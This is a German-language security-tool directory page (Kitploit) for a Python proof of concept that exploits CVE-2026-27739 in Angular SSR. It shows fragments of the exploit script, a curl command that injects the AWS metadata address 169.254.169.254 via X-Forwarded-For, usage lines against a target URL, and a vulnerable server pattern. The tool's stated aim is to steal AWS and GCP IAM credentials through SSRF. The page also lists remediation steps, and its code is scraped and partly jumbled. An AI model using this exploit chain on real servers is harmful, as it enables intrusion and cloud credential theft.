Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-27739-POC — Python-PoC, das CVE-2026-27739 in Angular SSR ausnutzt: Header-Injection über Prototype Pollution und SSRF-Verkettung zu AWS IMDS/GCP-Metadaten zum Diebstahl von Anmeldedaten. | Kitploit
Tools/GitHubGitHub/mr-redoo7/cve-2026-27739-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstestsAPI-Sicherheit
GitHubmr-redoo7/cve-2026-27739-poc

CVE-2026-27739-POC

Python-PoC, das CVE-2026-27739 in Angular SSR ausnutzt: Header-Injection über Prototype Pollution und SSRF-Verkettung zu AWS IMDS/GCP-Metadaten zum Diebstahl von Anmeldedaten.

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

-CVE-2026-27739-poc

curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target}

2. Header-Injection durch Prototype Pollution (CVSS: 7.5)

Beschreibung: Angular SSR verarbeitet unsichere Query-Parameter, die die Prototype-Chain beeinflussen Auswirkung: Manipulation von Request-Headern, potenzielle SSRF-Verkettung

Behebung

  1. X-Forwarded-* Header-Verarbeitung entfernen/deaktivieren oder bekannte Proxies auf eine Whitelist setzen
  2. Strikte URL-Validierung vor SSRF-anfälligen Operationen implementieren
  3. express-validator oder Ähnliches zur Header-Bereinigung verwenden
  4. AWS/GCP-Metadata-Endpunkte deaktivieren oder IMDSv2 mit Hop-Limit verwenden """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report)

def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")

root@kitploit:~
args = parser.parse_args()

exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify)

print(f"[+] Targeting: {args.target}")
print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}")

# Execute exploit chain
exploit.test_header_injection()
exploit.exploit_ssrf_chain()
exploit.extract_sensitive_data()
exploit.generate_report()

if name == "main": main() Verwendung bash

Basic SSRF test

python3 angular_ssr_exploit.py https://target.com

With SSL bypass for self-signed certs

python3 angular_ssr_exploit.py https://target.com --no-ssl-verify Funktionsweise Header-Injection-Test: Sendet Prototype-Pollution-Payloads und unsichere Forwarded-Header, die Angular SSR möglicherweise unsicher verarbeitet SSRF-Kette: Testet den Zugriff auf AWS IMDS, GCP-Metadata und localhost-Dienste über X-Forwarded-For/X-Original-URL IMDSv2-Token-Extraktion: Verkettet SSRF, um AWS-Metadata-Token und anschließend IAM-Anmeldedaten zu stehlen Automatisierte Berichterstellung: Erzeugt einen CVSS-bewerteten Pentest-Bericht mit PoCs Technische Details Grundursache: Angular Universal SSR-Apps leiten req.headers häufig direkt an interne APIs weiter, ohne Bereinigung:

javascript

// Vulnerable Angular SSR pattern app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

Tool herunterladen